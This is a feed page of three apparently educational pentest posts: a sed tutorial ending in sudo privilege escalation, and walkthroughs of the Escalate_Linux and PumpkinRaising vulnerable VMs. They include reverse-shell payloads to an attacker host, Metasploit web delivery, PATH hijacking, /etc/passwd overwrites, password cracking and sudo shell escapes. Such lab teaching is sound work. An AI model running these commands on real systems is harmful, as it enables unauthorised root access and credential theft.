  • Add Tags 

This article will take our readers through all about Stream Editor (Sed), which is one of the most prominent text-processing services on GNU/Linux. In this article, we came with the brief introductory guide to sed which supports the main concern that how sed works and how we can accomplish its supplementary practice in the operation of Privilege Escalation.

NOTE: “The main objective of publishing the series of “Linux for pentester” is to introduce the circumstances and any kind of hurdles that can be faced by any pentester while solving CTF challenges or OSCP labs which are based on Linux privilege escalations. Here we do not criticize any kind of misconfiguration that a network or system administrator does for providing higher permissions on any programs/binaries/files & etc.”

Table of Content

Overview of sed                                            

  • Summary to sed
  • Chief Action achieved using sed
    • Replacement with the sed command
    • Printing and viewing from sed command
    • Deleting lines with sed

Abusing sed

  • SUDO Lab setups for privilege Escalation
  • Exploiting SUDO
Summary to sed

SED command in LINUX/UNIX stands for “stream editor” that can implement lots of purpose on file like, searching, find and replace, insertion or deletion. However, the most common use of SED command is for exchange or for discover and swap. By using SED you can edit files even without opening it, which is a much faster technique to find and replace something in the file. It is a powerful text stream editor which can do insertion, deletion, search etc. for any file as per user requirements. This command also supports regular expression that allows it to perform complex pattern matching too. Now to know further about the “sed” command we will start from its help option.

Note: “It’s worth remarking that this article omits several commands, as our main concern is to reach about the “sed” influence over Privilege Escalation.

sed --help

Key actions achieved by “sed”

  • Replacement with the sed command: As we know the “sed” performs many tasks that include insertion, deletion, modification and so on for any file as per user request so now we will start our journey to explore the entire utility of sed one by one.

1.1 Substituting or switching string: “sed” is used to replace or swap the string so whenever we need to exchange any string within a file then we will frame command as:

nano Ignite.txt
cat Ignite.txt
sed 's/Ignite/Egnyte/' Ignite.txt

In the above command “s” denotes the substitution action. The “Ignite” is the hunt pattern and the “Egnyte” is the replacement string. By default, the sed command replaces the first incidence of the pattern in each line and it won’t replace the second, third…occurrence in the line.

1.2 Substituting the nth existence in a line: When we want to replace nth occurrence i.e. first, second and so on the existence of a pattern in a line then we will use the /1, /2 etc flags to mention the nth term.

sed 's/Ignite/Egnyte/2' Ignite.txt

Here I’m swapping for 2nd occurrence in each line.

1.3 Substituting all the existence at a time: As we know by default the sed command replaces the first incidence of the pattern in each line so if we wish to replace all occurrence simultaneously within a file then we can use flag “/g” for this purpose.

 sed 's/Ignite/Egnyte/g' Ignite.txt

1.4 Substituting from nth occurrence to all existences: When we use “/g” this will make change globally to the entire file so if we want to make this swapping from a specific place then we need to mention that value(nth) from where we want to make changes.

sed 's/Ignite/Egnyte/3g' Ignite.txt

On framing the above command it will replace all the patterns from the nth occurrence globally.

Note: In the below image you can’t see any changes for flag “3g” as my file doesn’t contain any 3rd occurrence of the replaced word but whenever there is the existence of substituted word at multiple times within a line then you can clearly see the changes that how its change globally from nth term.

1.5 Substituting the existence for a particular range:  We can limit the sed command to replace the string for a particular range. This can be achieved by framing command as shown below.

sed ‘1,3 s/Ignite/Egnyte/’ Ignite.txt

On framing this command the “sed” will replace “Ignite” starting from the first line to the third line.

Note:  One can use “$” in place of end index if we want substitute from nth term to the last line in the file.

  • Printing and viewing from sed command: Apart from substituting the string sed can help in printing and viewing a file as per user’s instruction.

2.1 Replicating the replaced line with /p flag: If we want to make duplication for replaced line then we can use the “/p” flag which prints the replaced line twice on the terminal. If a line does not have the search pattern and is not replaced, then it will print that line only once.

sed ‘s/Ignite/Egnyte/p’ Ignite.txt

2.2 Printing only the replaced lines: If a user wants to print only those lines which are substituted then he can use “-n” option following by print command as shown below.

sed -n ‘s/Ignite/Egnyte/p’ Ignite.txt

As from below image it can be cleared that on using “-n” the print flag has printed all the replaced line as output.

2.3 Printing lines by numbering it: This command is similar to “cat” in which we use “-n” for numbering the line for any file, same we can achieve from sed command too by framing the command as below.

sed = a.txt | sed 'N; s/^/     /; s/ *\(.\{4,\}\)\n/\1  /'

On drawing the above command sed will print the output by numbering each line as per user request.

2.4 Display a file from x to y range: If we want to view a file from an instance i.e. for a range of starting index to end index then we write command as:

sed -n '2,4p' Ignite.txt

If we use “d” instead of “p” then sed will View the entire file except for the given range.

2.5 Print nth line of the file: Inplace of fixing end index you can also leave it blank if you wish to print only a specific line.

sed -n '4'p Ignite.txt

As in below screenshot, you can see when I have used above-mentioned command then sed has reflected the output only to print for the 4th line.

2.6 Print from nth line to end of file: To print any file from its nth line to the last (end of file) line then frame command as below:

sed -n '4,$'p Ignite.txt

Here “$” is an indication for reflecting the last line of the file.

2.7 Print the line only for pattern matching: If we want to print only those lines which match the given pattern then, in this case, we will draw command as:

sed -n /training/p Ignite.txt

From the below image, it is clear how this command works. Here in the below image, I have print those lines which include the word “training”.

2.8 Print lines which matches the pattern nth line: We can use numeric value along “p” to print for pattern matching till nth line.

sed -n '/cyber/,3p' Ignite.txt

3 Deleting lines with sed: Now we check how we can delete the lines from a file by the help of sed.

 3.1 Remove a specific line: To delete any particular line within a file us “d” option followed by sed command. Here I’m deleting the 3rd line from “Ignite.txt”.

sed '3d' Ignite.txt

3.2 Remove line for a range: If we wish to delete content till a particular range then we will set its “initial index value” and “end value” of file. In below image, I have deleted the content of “Ignite.txt” from its 3rd line to 5th line and will attain output for remaining file content.

sed '3,5d' Ignite.txt

3.3 Remove from nth to last line: Instead of fixing end index one can also use “$” to delete lines till the end of the file.

sed '2,$d' Ignite.txt

Here “2” indicating for the initial index from where deletion must be done and “$” is indicating to delete lines till the end of the file.

3.4 Remove the last line: If we won’t set any index value then “$d” will simply delete only the last line of the file.

sed '2d' Ignite.txt

3.5 Remove the pattern matching line: Sometimes we not only want to print or view those lines that match the particular pattern but also desire to delete them so in such case we will frame below command to attain output as per user request.

sed '/training/d' Ignite.txt

Here in below image sed has deleted all those lines which match the word “training”.

Abusing sed Sudo Rights Lab setups for Privilege Escalation

Now we will start our mission of privilege escalation. To grab this first, we have to set up our lab of sed command with administrative rights. After that, we will check for the sed command that what impact it has after getting sudo rights and how we can use it more for privilege escalation.

It can be clearly understood by the below image in which I have created a local user (test) who own all sudo rights as root and can achieve all task as admin.

To add sudo right open etc/sudoers file and type following as user Privilege specification.

test All=(root) NOPASSWD: /usr/bin/sed

Exploiting Sudo rights

Now we will start exploiting sed facility by taking the privilege of sudoer’s permission. For this very first we must have sessions of a victim’s machine then only we can execute this task. Suppose we got the sessions of victim’s machine that will assist us to have local user access of the targeted system through which we can escalate the root user rights.

So now we will connect to the target machine with ssh, therefore, type following command to get access through local user login.

ssh test@192.168.1.108

Then we look for sudo right of “test” user (if given) and found that user “test” can execute the pip command as “root” without a password.

sudo -l

Now we will access our /etc/passwd file by the help sed command to escalate or maintain access with elevated privileges.

Conclusion: Hence we have successfully exploited “sed” by achieving its functionality after granting higher privilege. 

Reference link: https://gtfobins.github.io

Author: Komal Singh is a Cyber Security Researcher and Technical Content Writer, she is completely enthusiastic pentester and Security Analyst at Ignite Technologies. Contact Here

The post Linux for Pentester: sed Privilege Escalation appeared first on Hacking Articles.

  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

Escalate_Linux is an intentionally developed Linux vulnerable virtual machine. The main focus of this machine is to learn Linux Post Exploitation (Privilege Escalation) Techniques. The credit for making this VM machine goes to “Manish Gupta” and it is a boot2root challenge where the creator of this machine wants us to root the machine through twelve different ways. You can download the machine following this link: https://www.vulnhub.com/entry/escalate_linux-1,323/

NOTE: In this article, we have exploited the machine with six different methods.

Security Level: Beginner-Intermediate

Penetrating Methodology:

Scanning

  • Netdiscover
  • Nmap

Enumeration

  • Web Directory Search 

Exploiting

  • Metasploit shell upload
  • sh

Privilege Escalation

  • Method 1: Get root shell by exploiting suid rights of the shell file
  • Method 2: Get a root shell by cracking the root password
  • Method 3: Get root shell by exploiting sudo rights of user1
  • Method 4: Get root shell by exploiting crontab
  • Method 5: Exploiting Sudo rights of vi editor
  • Method 6: Exploiting writable permission of /etc/passwd file
Walkthrough: Scanning:

Let’s start off by scanning the network using Netdiscover tool and identify the host IP address. We can identify our host IP address as 192.168.0.17.

Now let’s scan the services and ports of target machine with nmap

nmap -A 192.168.0.17

Enumeration:

As we can see port 80 is open, so we tried to open the IP address in our browser and got nothing but the default Apache webpage.

So we used dirb with .php filter for directory enumeration.

dirb http://192.168.0.17/ –X .php

After brute-forcing with dirb, we found a URL named http://192.168.0.17/shell.php

Now we opened the URL in our browser and found that it accepts cmd as get parameter.

So, we passed the id command in the URL and found the results are reflected in the response.

Exploiting

Since the target machine is vulnerable to command injection, we created a web delivery shell using Metasploit.

use exploit/multi/script/web_delivery
set srvhost 192.168.0.12
set lhost 192.168.0.12
exploit

The target host was not able to run the script directly, so we used URL encoding.

After encoding the script, we were successfully able to run it on the target machine and get the meterpreter session.

We got the bash shell of User6 after using python one-liner shell command.

To further enumerate the target host, we uploaded LinEnum tool on the target host.

upload /root/LinEnum.sh .
shell
python -c 'import pty;pty.spawn("/bin/bash")'
chmod 777 LinEnum.sh
./LinEnum.sh

From the results of LinEnum scan, we found that the target host has eight users namely user1, user2 up to user8.

We also found that in crontab, a file named autoscript.sh is being run every 5 minutes with root privileges.

From the same LinEnum scan, we came to know that /etc/passwd is writable for users also. Also, we found that we can run shell and script files with root privileges because SUID bit is enabled on it.

Privilege Escalation:

As mentioned above there are multiple ways to do the privilege escalation of this machine.

We will try to do as many methods as possible.

Method 1: Get root shell by exploiting SUID rights of the shell file

Using the find command we can confirm that the shell file located in the home directory of user3 can be executed with root privileges.

We tried to execute the same file and got the root shell.

find / -perm -u=s -type f 2>/dev/null
cd /home/user3
./shell

Method 2: Get a root shell by cracking the root password

From the above screenshot, we know that the script file located in the user5 home directory can be executed with root privileges. Using the Path variable exploitation methodology we can access the /etc/shadow file.

To know more about path variable privilege escalation use this link: https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/

cd /tmp
echo "cat /etc/passwd" > ps
chmod 777 ps
export PATH=/tmp:$PATH
cd /home/user5
./script

on executing ./script, we have fetched the content of shadow’s file as shown in the below image.

We copied the hashed password of root user in the hash file and used John The Ripper tool to crack the password. We got the password of the root as 12345 and then using the su command we were able to access as root.

john hash
su root

Method 3: Get root shell by exploiting SUDO rights of user1

We already know by now that script file can be executed with root privileges.

Using the same script file we can change the password of all the users with the help of Path variable methodology.

Here we used echo and chpasswd command to replace the existing password with our new password 12345. And then switched to the user1 account using su command. After checking the sudoer’s list for user1 we came to know that this user can run all commands as sudo.

So we ran the command sudo su and got the root access.

echo 'echo "user1:12345" | chpasswd' > ls
chmod 777 ls
export PATH=/tmp:$PATH
cd /home/user5
./script
su user1
sudo –l
sudo su

Method 4: Get root shell by exploiting crontab

In the previous screenshot, we saw there is a task scheduled after every 5 minutes for user4 in the crontab by the name autoscript.sh. We changed the password of user4 the same way as we did for user1 and then switched to user4 with the new password 12345. There we can see a file autoscript.sh in the Desktop folder.

su user4
ls -la

So what we did is we created a payload using msfvenom and then copied the code into autoscript.sh file using echo.

msfvenom –p cmd/unix/reverse_netcat lhost=192.168.0.12 lport=8888 R

echo "code" > autoscript.sh

After copying the code into autoscript.sh file we executed the file and started the netcat listener on our kali machine and waited for the shell.

Yes we got the root shell as the autoscript.sh is executing as root in the crontab.

nc –lvp 8888
id

Method 5: Exploiting SUDO rights of vi editor

We changed the password of all the users to 12345 using the same methodology as above and switched between users to check for more exploits. We found that user8 has a sudo permission for vi editors.

su user8
sudo -l

Open the vi editor with sudo and insert sh command as shown in the screenshot below, exit the editor and hurray we got the root shell.

:!sh
ids

And again we will obtain the root shell as shown below in the image.

Method 6: Exploiting writable permission of /etc/passwd file

Continuing with the enumeration of users, we found that user7 is a member of the root group with gid 0.

And we already know from the LinEnum scan that /etc/passwd file is writable for the user. So from this observation, we concluded that user7 can edit the /etc/passwd file.

tail /etc/passwd
su user7
id

So we copied the contents of /etc/passwd file in our kali machine and created a new user named raj with root privileges for which we generated a password pass123 using openssl.

openssl passwd -1 -salt ignite pass123

As you can observe we have created a new entry inside /etc/passwd for user raj with root privilege.

On the target machine, we downloaded the edited passwd file in the /etc folder using wget command.

Then we tried to switch to our newly created user raj and YES yet again we proudly got the root shell of the machine.

cd /etc
wget –O passwd http://192.168.0.12:8000/passwd
su raj
id

Conclusion: So in this part-1 of Escalate_Linux we did the privilege escalation by six different methodologies. In the part-2 we will try to exploit the machine by some different methods. So keep visiting Hacking Articles for next part.

Author: Auqib Wani is a Certified Ethical Hacker, Penetration Tester and a Tech Enthusiast with more than 5 years of experience in the field of Network & Cyber Security. Contact Here

The post Escalate_Linux: Vulnhub Walkthrough (Part 1) appeared first on Hacking Articles.

  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

PumpkinRaising is another CTF challenge from the series of Mission-Pumpkin v1.0 created by keeping beginners in mind and all credit for this VM goes to Jayanth. This level is all about identifying 4 pumpkin seeds (4 Flags – Seed ID’s) and gain access to root and capture the final Flag.txt file.

You can download it from here: https://www.vulnhub.com/entry/mission-pumpkin-v10-pumpkinraising,324/

Level: Beginner to Intermediate

Penetrating Methodologies

Scanning

  • Nmap

Enumeration

  • txt
  • Abusing HTTP services

Exploiting

  • Ssh Login

Privilege Escalation

  • Abusing Sudo right
Walkthrough

Scanning

Let’s start with network scanning as the IP of this VM is 192.168.0.11. So, initializing this VM by scanning open port and running services over those port with the help nmap.

nmap -A 192.168.0.11

From its scan result, I found port 22 for ssh and 80 for http are available, moreover it gave some hint for /robot.txt file that disallows 23 entities. 

Enumeration

So first we navigate to a web browser and explore the VM IP and welcome by following web page. Read the following message:

“To raise Pumpkins, we need to collect seeds in the first step. Remember Jack? He is the only expert we have in raising healthy Pumpkins. It’s time to get in search of pumpkin seeds”

From this message, we can assume for “Jack” which could be a username.

Further, I explored /robot.txt file suggested in nmap scan and found some list of interesting directories, files and paths. Apart from all entries, I found a few interesting entries such as: /hidden/notes.txt, /underconstruction.html and /seeds/seed.txt.gpg.  so, we have explored each entry one-by-one.

The hidden note.txt showed certain data which may be needed to login credentials subsequently.

http://192.168.0.11/hidden/notes.txt
Robert: C@43r0VqG2=
Mark: Qn@F5zMg4T
goblin: 79675-06172-65206-17765

when I checked the source code of the homepage and here, I found a link for pumpkin.html

On exploring source code of http://192.168.0.11/pumpkin.html, I found a base32 encoded string.

With the help of online base32 decoder, we have decoded the string and note the path /scripts/spy.pcap that could be a hint for seed’s id.

To identify what is inside the spy.pcap file, I simply downloaded the file in our local machine and used Wireshark to read the network packet.

Here I found the first seed: 50609 from inside the tcp steam as shown in the below image.

Again, we come back to pumkin.html page and I found the decimal string on scrolling same file.

On decoding decimal string, we found one more seed:96454

As you know we have enumerated /robots.txt and from inside that, we found another important file /underconstrution.html as shown below. So, we have explored the source code of the web page and noted hint for an image.

Now, we have explored the below URL and found a picture for pumpkin which I have downloaded in my local machine.

http://192.168.0.11/images/jackolantern.gif

After downloading the pumpkin image, I check for hidden data with help of stegosuite. This image was password protected image and if you remembered we had enumerated “Mark: Qn@F5zMg4T” secret keys from inside /hidden/notes.txt

I used the key: Qn@F5zMg4T for extracting the hidden file “decorative.txt” from inside the stegno image.

So, when I opened this file, it gave me another PUMP-Ke-Mon Pumpkin seed: 86568

Further, I downloaded the .gpg file as the link /seeds/seed.txt.gpg which was mention in the robot.txt file.

wget http://192.168.0.11/seeds.txt.gpg
gpg -d seeds.txt.gpg

So, when I tried to open the file, I noticed that it requires the passphrase to decrypt the encrypted data which I don’t know. Here I tried to use above enumerated keys but could not able to decrypt it. After so many attempts, I successfully decrypted the file by entering SEEDWATERSUNLIGH which was mentioned in the home page of website in the 2nd image.

 On decrypting I obtained following text file as shown below and it was a Morse encoded text which used in telecommunication that encodes text characters as standardized sequences of two different signal durations called dots and dashes.

To decrypt the Morse text I have used cyberchef which is an online decrypting tool. On decrypting the text, I found another BIGMAXPUMPKIN seed 69507

As it was declared by the author that in this VM we need to find 4 SEED’s ID and a root flag. Hence, we have collected all 4 seed’s id but for getting root flag, we need to compromise the VM.  

When I didn’t get any vulnerability to compromised it, I tried to access ssh by the combination of all 4 seed found in this VM and used this as a password for user jack.

  1. SEED ID: 69507  
  2. SEED ID: 50609
  3. SEED ID: 96454
  4. SEED ID: 86568

ssh jack@192.168.0.11
SSH login Password: 69507506099645486568

Yuppie!! We got the shell access but for obtaining root flag we need to escalate the privilege from low privilege shell to high. Therefore, I check for sudo rights for user jack and found jack can run strace with sudo rights.

 Hmmm! We can abuse the sudo permission set for strace program. Hence type following and obtain the root flag.

sudo strace -o/dev/null /bin/bash
cd /root
ls
cat flag.txt

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post PumpkinRaising : Vulnhub Walkthrough appeared first on Hacking Articles.

Read for later

Articles marked as Favorite are saved for later viewing.
close
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

Separate tags by commas
To access this feature, please upgrade your account.
Start your free month
Free Preview